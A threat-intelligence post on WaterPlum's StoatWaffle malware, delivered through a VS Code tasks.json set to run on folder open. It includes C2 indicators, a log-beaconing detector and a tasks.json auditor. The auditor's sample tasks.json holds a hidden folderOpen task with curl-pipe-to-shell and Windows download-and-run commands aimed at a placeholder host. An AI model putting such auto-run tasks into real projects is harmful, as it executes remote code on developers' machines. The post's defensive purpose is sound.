Commissioned, Curated and Published by Russ. Researched and written with AI.


What’s New This Week

North Korean threat group WaterPlum, the operators behind the long-running Contagious Interview campaign, have a new trick. Instead of convincing developers to run suspicious commands during a fake technical interview, they’ve moved the trigger into the editor itself. Open a project in VS Code, grant folder trust, and you’re already compromised. The mechanism is a single key in .vscode/tasks.json. It’s been live since December 2025, and it took three months for researchers to formally document it.


Changelog

Date          Summary
25 Mar 2026   Initial publication.

The attack doesn’t require you to run anything. That’s what makes it different.

WaterPlum – the North Korean threat group behind the Contagious Interview campaign – has been deploying a new malware family called StoatWaffle since approximately December 2025. The delivery mechanism is a .vscode/tasks.json file with one specific setting: runOn: folderOpen. When a developer opens the malicious repository in VS Code and clicks “Trust” on the workspace prompt, the payload executes automatically.

No additional commands. No “run this to complete your assessment.” Just: open folder, done.

The Mechanism

VS Code’s task runner is a legitimate feature. You define tasks in .vscode/tasks.json: build steps, test runners, formatters. Setting a task’s runOptions.runOn to folderOpen tells VS Code to start that task automatically every time the project folder is opened in a trusted workspace. It’s designed for things like starting a dev server.

WaterPlum configured this to download a payload from a Vercel-hosted web application. The payload runs regardless of operating system.

According to NTT Security’s analysis of StoatWaffle, the chain works like this:

  1. Victim opens the malicious repository in VS Code and trusts the workspace
  2. tasks.json triggers immediately, downloading an initial script from Vercel
  3. That script runs via cmd.exe on Windows (equivalent on other platforms)
  4. The downloader checks whether Node.js is installed. If not, it downloads and installs it from the official Node.js website
  5. It then downloads env.npl and package.json, executing env.npl via Node.js
  6. env.npl polls /api/errorMessage on a C2 server every 5 seconds, executing any response as Node.js code
  7. About 5 minutes in, a second downloader arrives, polling a different C2 endpoint (/api/handleErrors) on the same server, also every 5 seconds
  8. The Stealer and RAT modules deploy from that second downloader

The whole thing is modular and Node.js-based. NTT Security describe it as “a modular malware implemented by Node.js” with Stealer and RAT components. Because it runs as Node.js, it works across Windows, macOS, and Linux without modification.

What StoatWaffle Does

The Stealer module targets browser credentials. For Chromium-family browsers, it grabs stored credentials and browser extension data. For Firefox, it reads extensions.json to enumerate installed extensions and checks against a keyword list – the researchers don’t specify the full list, but this targeting suggests specific crypto wallets and password manager extensions.

On macOS, the Stealer also copies the iCloud Keychain database.

Stolen files get copied to a temporary directory with a random name, then uploaded to /upload on the C2 server. Separately, a list of installed software on the victim host goes to /uploadsecond. The Stealer also checks whether it’s running inside WSL. If so, it resolves the Windows user profile path using wslpath – a specific adaptation to grab Windows data from a Linux process.

The RAT module maintains persistent communication with the C2 server. NTT Security documented its command set: change working directory, enumerate files and directories, execute Node.js code, upload a file, recursively search directories and upload matching files, run shell commands, and terminate itself.

That last one matters. The RAT can terminate itself on command, so by the time anyone looks at the host the process that did the exfiltration may no longer be running, which makes live forensic analysis harder.

The Delivery Chain

WaterPlum delivers this via fake job interviews. Microsoft’s analysis of Contagious Interview describes “convincingly staged recruitment processes” that mirror legitimate technical assessments. Victims receive a repository link – usually framed as an assignment or code review task – and are asked to open it and work through it.

The repositories are themed around blockchain development. That’s consistent across multiple campaigns WaterPlum has run. The fake GitHub, GitLab, or Bitbucket repos look plausible to a developer who’s been prepped to expect a crypto or Web3 engineering assessment.

Targets are not randomly selected. They’re typically founders, CTOs, and senior engineers in the cryptocurrency and Web3 space – people with elevated system access and, critically, access to company cryptocurrency wallets. A recent case documented by AllSecure.io involved an unsuccessful attempt against the company’s founder via a LinkedIn approach.

WaterPlum creates fake LinkedIn company pages to establish credibility, and builds out GitHub accounts with enough history to look legitimate. The infrastructure investment is significant.

The Broader Pattern

This VS Code attack is one thread in a much larger campaign. At the same time as StoatWaffle was being deployed, WaterPlum was:

  • Publishing malicious npm packages distributing PylangGhost, a Python-based backdoor (the first time it had been distributed via npm)
  • Compromising the Neutralinojs GitHub organisation by obtaining write access via a compromised long-time contributor, then force-pushing BeaverTail malware into the build pipeline, with payloads hidden in Tron, Aptos, and Binance Smart Chain transactions
  • Running the PolinRider campaign, implanting obfuscated JavaScript into hundreds of public GitHub repositories

The sub-group responsible for StoatWaffle is “Team 8” – also known as the Moralis or Modilus family. This team previously used OtterCookie as its primary payload, switching to StoatWaffle around December 2025. The capability development here is continuous. NTT Security note directly that “WaterPlum is continuously developing new malware and updating existing ones.”

Sophos, tracking the activity as Nickel Alley, notes that “while these attacks appear to have a central goal of cryptocurrency theft, the threat group has demonstrated its intention to use initial access for further supply chain compromise or corporate espionage.” Victim profiling happens before the follow-on payload is selected.

Indicators of Compromise

NTT Security published IP-based IOCs from their investigation:

  • 185[.]163.125.196
  • 147[.]124.202.208
  • 163[.]245.194.216
  • 66[.]235.168.136
  • 87[.]236.177.9

The addresses are defanged (the first dot is bracketed) so they can’t be clicked or resolved by accident; restore the dots before loading them into a blocklist or a log search. These are C2 addresses from the investigated campaign; new infrastructure should be expected.
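As an added example that is not part of the original article and not code from NTT Security or any vendor, the Python below turns two of the observables reported above into a check you can run over egress or proxy logs: the defanged C2 list (restored to real addresses) and the downloader’s habit of polling /api/errorMessage and later /api/handleErrors every five seconds. The log format, the host names, the RFC 5737 test-net addresses and every log line are constructed for the example; only the five C2 addresses come from the article. Adapt parse_line() to your own proxy or Zeek http.log fields.

```python
"""Flag known StoatWaffle C2 contacts and fixed-cadence polling in egress logs.

Added example for this article; not NTT Security's or any vendor's code.
The log format and all sample log lines are constructed. Only DEFANGED_C2
(the article's IOC list) and DOWNLOADER_PATHS (the polled endpoints the
article reports) come from the source.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# C2 addresses exactly as published (defanged) in the article's IOC list.
DEFANGED_C2 = [
    "185[.]163.125.196",
    "147[.]124.202.208",
    "163[.]245.194.216",
    "66[.]235.168.136",
    "87[.]236.177.9",
]

# Endpoints the first and second downloader poll, per the article.
DOWNLOADER_PATHS = {"/api/errorMessage", "/api/handleErrors"}


def refang(ioc: str) -> str:
    """Undo the '[.]' defanging so the value can be matched or blocklisted."""
    return ioc.replace("[.]", ".")


KNOWN_C2 = {refang(ip) for ip in DEFANGED_C2}

# Constructed log format: <ISO8601 UTC> <src host> <dst ip> <method> <path> <status>
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+(?P<dst>\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+(?P<status>\d{3})$"
)


def parse_line(line: str):
    """Parse one constructed log line into a dict, or None if it doesn't match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))
    return ev


def known_c2_hits(events) -> set:
    """(host, dst) pairs that contacted a published C2 address."""
    return {(e["host"], e["dst"]) for e in events if e["dst"] in KNOWN_C2}


def periodic_beacons(events, min_requests: int = 6, max_jitter: float = 0.2) -> list:
    """Flag (host, dst, path) streams whose request cadence is nearly constant.

    A stream needs at least min_requests hits, and the population stdev of its
    inter-request gaps must be below max_jitter * median gap. The period is
    reported rather than assumed, so a sample with a timer other than 5 s is
    still caught; known_c2 and downloader_path say why a hit is actionable.
    """
    streams = defaultdict(list)
    for e in events:
        streams[(e["host"], e["dst"], e["path"])].append(e["ts"])
    findings = []
    for (host, dst, path), stamps in streams.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        median = statistics.median(gaps)
        if median <= 0 or statistics.pstdev(gaps) / median > max_jitter:
            continue
        findings.append({
            "host": host, "dst": dst, "path": path,
            "period_s": round(median, 1), "requests": len(stamps),
            "known_c2": dst in KNOWN_C2,
            "downloader_path": path in DOWNLOADER_PATHS,
        })
    return findings


def analyze(log_text: str) -> dict:
    """Run both checks over a block of log text."""
    events = [ev for ev in map(parse_line, log_text.splitlines()) if ev]
    return {"known_c2": known_c2_hits(events), "beacons": periodic_beacons(events)}


def _stream(host, dst, path, offsets):
    """Build constructed log lines for one host/destination/path at given second offsets."""
    base = datetime(2026, 3, 20, 10, 0, 0, tzinfo=timezone.utc)
    return [f"{(base + timedelta(seconds=o)).isoformat().replace('+00:00', 'Z')} "
            f"{host} {dst} GET {path} 200" for o in offsets]


# Constructed sample: one host polling a listed C2, one polling unlisted
# infrastructure on the same cadence, a benign 30 s health check (periodic but
# not actionable) and ordinary irregular developer traffic.
SAMPLE_LOG = "\n".join(
    _stream("dev-laptop-07", "185.163.125.196", "/api/errorMessage", range(0, 35, 5))
    + _stream("dev-laptop-12", "203.0.113.7", "/api/handleErrors", range(0, 30, 5))
    + _stream("dev-laptop-12", "203.0.113.7", "/upload", [40, 41])
    + _stream("build-runner-3", "198.51.100.5", "/healthz", range(0, 180, 30))
    + _stream("dev-laptop-02", "203.0.113.9", "/api/errorMessage", [0, 7, 30])
    + _stream("dev-laptop-02", "192.0.2.44", "/npm/-/ping", [0, 13, 21, 40, 44, 70, 75, 100])
)

if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for host, dst in sorted(result["known_c2"]):
        print(f"KNOWN C2: {host} -> {dst}")
    for b in result["beacons"]:
        tag = "downloader path" if b["downloader_path"] else "unknown path"
        print(f"PERIODIC: {b['host']} -> {b['dst']}{b['path']} every {b['period_s']}s ({tag})")
```

The cadence check on its own is noisy (the health-check stream is reported too); what makes a hit worth paging on is the combination with either a listed address or one of the downloader endpoints, and that pairing is what catches the second host here, which talks to an address not on the published list.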

What You Can Do

The VS Code workspace trust prompt is your primary control here. VS Code will ask whether you trust the authors of a folder before executing workspace tasks. That prompt is doing real work – do not reflexively click through it.

For stricter control, VS Code’s task.allowAutomaticTasks setting can disable automatic task execution entirely. Set it to "off" in your user settings to prevent runOn: folderOpen tasks from running without explicit approval:

"task.allowAutomaticTasks": "off"

This doesn’t prevent VS Code from reading tasks.json – it just stops tasks from auto-executing. You’d still need to run them manually.
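As an added example that is not part of the original article, and not code from VS Code or NTT Security, the Python below covers both the trigger described under The Mechanism and the setting above: it parses a checked-out repository’s .vscode/tasks.json the way VS Code does (comments and trailing commas allowed, which plain json.loads rejects), reports every task whose runOptions.runOn is folderOpen, and checks a settings document for task.allowAutomaticTasks being off. The sample tasks.json, the settings dictionary and the placeholder command pointing at a .invalid domain are constructed for the example; they are not the campaign’s real files.

```python
"""Audit a checked-out repository for VS Code tasks that fire on folder open.

Added example for this article; not VS Code's, NTT Security's or the
campaign's code. SAMPLE_TASKS_JSON and SAMPLE_SETTINGS are constructed, and
the curl command inside them is a placeholder under the reserved .invalid TLD.
"""
import json
from pathlib import Path


def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments and trailing commas, which VS Code accepts in
    tasks.json. String contents are left untouched, so a "//" inside a URL in
    a command survives. Two passes, so a comment sitting between a trailing
    comma and its closing bracket is handled as well."""
    for _ in range(2):
        out, i, n, in_str = [], 0, len(text), False
        while i < n:
            c = text[i]
            if in_str:
                out.append(c)
                if c == "\\" and i + 1 < n:      # keep escaped char verbatim
                    out.append(text[i + 1])
                    i += 2
                    continue
                in_str = c != '"'
                i += 1
            elif c == '"':
                in_str = True
                out.append(c)
                i += 1
            elif text.startswith("//", i):
                j = text.find("\n", i)
                i = n if j < 0 else j
            elif text.startswith("/*", i):
                j = text.find("*/", i + 2)
                i = n if j < 0 else j + 2
            elif c == ",":
                j = i + 1
                while j < n and text[j].isspace():
                    j += 1
                if j < n and text[j] in "}]":    # trailing comma: drop it
                    i += 1
                else:
                    out.append(c)
                    i += 1
            else:
                out.append(c)
                i += 1
        text = "".join(out)
    return text


def load_tasks(text: str) -> dict:
    """Parse a tasks.json document (JSON with comments) into a dict."""
    return json.loads(strip_jsonc(text))


def folder_open_tasks(tasks_doc: dict) -> list:
    """Every task VS Code would start as soon as the folder is trusted."""
    hits = []
    for task in tasks_doc.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        hits.append({
            "label": task.get("label"),
            "type": task.get("type", "process"),
            "command": task.get("command"),
            "args": task.get("args", []),
            # per-OS sections override command/args on that platform
            "os_overrides": {k: task[k] for k in ("windows", "osx", "linux") if k in task},
            "hidden": bool(task.get("hide")),   # "hide" keeps it out of the Run Task picker
        })
    return hits


def automatic_tasks_disabled(settings: dict) -> bool:
    """True when a settings document turns folderOpen tasks off."""
    return settings.get("task.allowAutomaticTasks") == "off"


def scan_tree(root: Path) -> dict:
    """Map each .vscode/tasks.json under root to its folderOpen tasks."""
    report = {}
    for path in root.rglob("tasks.json"):
        if path.parent.name != ".vscode":
            continue
        try:
            report[str(path)] = folder_open_tasks(load_tasks(path.read_text(encoding="utf-8")))
        except (ValueError, OSError) as exc:
            report[str(path)] = [{"error": str(exc)}]
    return report


# Constructed tasks.json: a comment, a trailing comma and a URL in the command,
# all tolerated by VS Code. The second task is the shape the article describes.
SAMPLE_TASKS_JSON = r'''{
  // See https://code.visualstudio.com/docs/editor/tasks
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "npm", "script": "build", "group": "build" },
    {
      "label": "prepare environment",
      "type": "shell",
      "command": "curl -fsSL https://setup.example.invalid/env.sh | sh",
      "windows": { "command": "curl.exe -s https://setup.example.invalid/env.cmd -o %TEMP%\\env.cmd && %TEMP%\\env.cmd" },
      "hide": true,
      "presentation": { "reveal": "never" },
      "runOptions": { "runOn": "folderOpen" },
    }
  ]
}'''

SAMPLE_SETTINGS = {"task.allowAutomaticTasks": "off"}   # constructed user settings

if __name__ == "__main__":
    for hit in folder_open_tasks(load_tasks(SAMPLE_TASKS_JSON)):
        print(f"folderOpen task {hit['label']!r} ({hit['type']}, hidden={hit['hidden']}): {hit['command']}")
        for os_name, override in hit["os_overrides"].items():
            print(f"  {os_name}: {override.get('command')}")
    print("automatic tasks disabled:", automatic_tasks_disabled(SAMPLE_SETTINGS))
```

Run scan_tree() over a staging directory before the repository is ever opened in the editor; anything it reports should be read, not trusted, and the per-OS overrides matter because a task that looks harmless on macOS can carry a different command for Windows.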

For developer teams processing untrusted repositories as part of interviews or assessments: use a dedicated VM or container. If you’re evaluating candidate code or third-party repositories regularly, that environment should not have access to your credentials, your browser data, or your keys.

WaterPlum is specifically targeting the moment in a developer’s workflow where professional context (a job interview, a code review) creates pressure to just open things and get on with it. The runOn: folderOpen mechanism exploits that pressure. The trust prompt stands between you and a compromised system – treat it like you would a sudo prompt, not a speed bump.

This tactic has been live since December 2025. Expect it to continue evolving.